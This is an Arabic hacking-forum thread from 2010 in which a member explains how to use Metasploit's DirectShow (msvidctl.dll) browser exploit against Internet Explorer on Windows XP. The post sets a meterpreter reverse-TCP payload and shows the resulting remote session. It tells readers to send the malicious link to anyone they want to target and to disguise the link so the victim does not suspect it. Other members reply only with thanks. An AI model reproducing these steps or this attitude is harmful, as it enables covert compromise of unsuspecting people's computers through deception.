نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] كل ما يتعلق بالميتاسبلوات و الاختراق المتقدم ..بفر افر فلو ..الخ

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 18/08/2010, 19:08   المشاركة رقم: 1
المعلومات
الكاتب:
 ZiRbE$t  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية ZiRbE$t

البيانات
التسجيل : Aug 2010
العضوية : 470
الاهتمامات : هكر
الإقامة : الجزائر
المواضيع : 5
الردود : 19
المجموع : 24
بمعدل : 0.00 يوميا
الاختراقات : [ليس لدي حساب]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 20/07/2015/12:15
سبب الغياب : حاظر
معدل التقييم: 0
نقاط التقييم: 10
ZiRbE$t is on a distinguished road
شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة

 Algeria


الإتصالات
الحالة:
ZiRbE$t غير متواجد حالياً
وسائل الإتصال:

Talking شرح ثغرة Microsoft DirectShow (msvidctl.dll) القاتلة

اليوم أنا رح اشرحلكم أخطر ثغرة هذه الأيام والمايكروسفت احد الأن ما لقت لها

ترقيع لأنها ثغرة محقونة في ملف مهم من الويندوز وهو ملف msvidctl.dllوهذا الملف

معروف بأنه ملف ActiveX أي الملف الذي يتحكم بالصورة أظن بأن الكل يعرفه

والثغرة قد سميت بــــــــــــــــــــــــــ:

IE DirectShow (msvidctl.dll) MPEG-2

وقد تمت اضافة الثغرة الى التحديث الاخير للميتاسبلوات باسم

Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption

وهذا ما سأعتمد عليه في الشرح

البسيط أرجوا أن لا يكون الشرح صعب لأنه بالنسبة لي لم يكن كذلك فأرجوا أن يكون بالنسبة

لكم أيضا أحبائي المهم وبدون اطالة نبدأمع الشرح:

نقوم بفتح الميتا سبلوات وهذا بعد أخر تحديث طبعا

كود:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole [sudo] password for carlos: | | _) | __ `__ _ __| _` | __| __ | _ | __| | | | __/ | ( |__ | | | ( | | | _| _| _|___|__|__,_|____/ .__/ _|___/ _|__| _| =[ msf v3.3-dev + -- --=[ 384 exploits - 261 payloads + -- --=[ 20 encoders - 7 nops =[ 166 aux msf >
نقوم باختيار هذا الامر فهو الاهم

PAYLOAD => windows/meterpreter/reverse_tcp

لاحظا الخيارات :

كود:
msf > use exploit/windows/browser/msvidctl_mpeg2 msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(msvidctl_mpeg2) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
سينتج لنا بعد ذلك التالي:

كود:
msf exploit(msvidctl_mpeg2) > set SRVPORT 80 SRVPORT => 80 msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158 LHOST => 192.168.1.158 msf exploit(msvidctl_mpeg2) > set URIPATH ChOrAhBiL SaFa7.html URIPATH => ChOrAhBiL SaFa7.html msf exploit(msvidctl_mpeg2) > exploit [*] Exploit running as background job. msf exploit(msvidctl_mpeg2) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:80/ChOrAhBiL SaFa7.html [*] Local IP: http://192.168.1.158:80/ChOrAhBiL SaFa7.html [*] Server started.
بعد ذلك نتتج لنا ملف من نوع gif نقوم بارساله هو والرابط لأي أحد نود استهدافه

http://192.168.1.158:80/ChOrAhBiL SaFa7.html

هذا الرابط لمن لم يفهم من الاحسن تمويه الرابط بمواقع التمويه لأنه ممكن يشك فيه هيك

بعدما يفتح الضحية الرابط ستمكننا الاكسبلورر من الاستغلال لاحظـــــــــــــــــــــوا:

كود:
[*] Sending HTML to 192.168.1.139:1126... [*] Sending exploit to 192.168.1.139:1126... [*] Sending GIF to 192.168.1.139:1126... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (206848 bytes) [*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1127) msf exploit(msvidctl_mpeg2) > sessions -i 1 [*] Starting interaction with 1... meterpreter >

وكل الاحباب والاصدقاء بدون استثناء




آخر مواضيع » ZiRbE$t

توقيع : ZiRbE$t

عرض البوم صور ZiRbE$t   رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ ZiRbE$t على المشاركة المفيدة:
S4wDz (29/07/2012)
قديم 18/08/2010, 19:32   المشاركة رقم: 2
المعلومات
الكاتب:
  WOLF_DZ  
اللقب:
.: نائب المدير :.

الإتصالات
الحالة:
WOLF_DZ غير متواجد حالياً
وسائل الإتصال:

رائع اخي
بارك الله فيك

عرض البوم صور WOLF_DZ   رد مع اقتباس
قديم 18/08/2010, 22:41   المشاركة رقم: 3
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:

ربي يعطيك الف عافية
**** لك

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 54
adiesmadi , ahmed75909 , alg3r3na , almaarifa , amir hide ip , متيم العراقي , مدمراليهود , مسعود92 , ben laden _dz , benaissa28 , BL_TI , djmohamed01 , DkRinG , doubleali , Dr-Google , Dz_V!rUs , بـونورة , hacker almooot , hacker dz , hamza 12 , hyassine53 , Ic3.BoY , جيفارا , خيالي... , Kamal , kamikaz-dz , khaled , luop1980 , malek2610 , marwane , MdMn HaCk3r , modehema , Mr.3Jr4M , MR.KaDeRoU , napster , رعد الجنوب , over-x , pain96 , pion33r , plateau , redacamp8 , S-japonia33 , S1LV3rS3rf3r , S4wDz , salem k , SAMIRALG , saudi_hack , sniperok , ThE JoCkEy , علي المسافر , WOLF_DZ , فرحان السعيد , ZiRbE$t , zxcvbnm

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Microsoft تحذر من ثغرة في متصفحها Internet Explorer بجميع إصداراته ADMINISTRATOR [ منتدى اخبــــار الشبكـــة] 0 24/12/2010 16:51
[برنامج]Microsoft .NET Framework 4.0 - Final X-P [ منتدى البرامج الكاملة والمشروحة ] 0 12/12/2010 00:29
Microsoft Kinect لجهاز Xbox 360 يتعرض للقرصنة ADMINISTRATOR [ منتدى اخبــــار الشبكـــة] 0 13/11/2010 22:20
برنامج ++Microsoft Visual C Mouna128 [ مـنـتـدي لـــغــات الـــبرمجـــه | Programming Language ] 1 19/08/2010 19:34
شرح ثغرة ترايدنت + ثغرة مركز تحميل مخزن ViRuS_Ra3cH [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] 2 26/07/2010 23:05

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 09:49.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115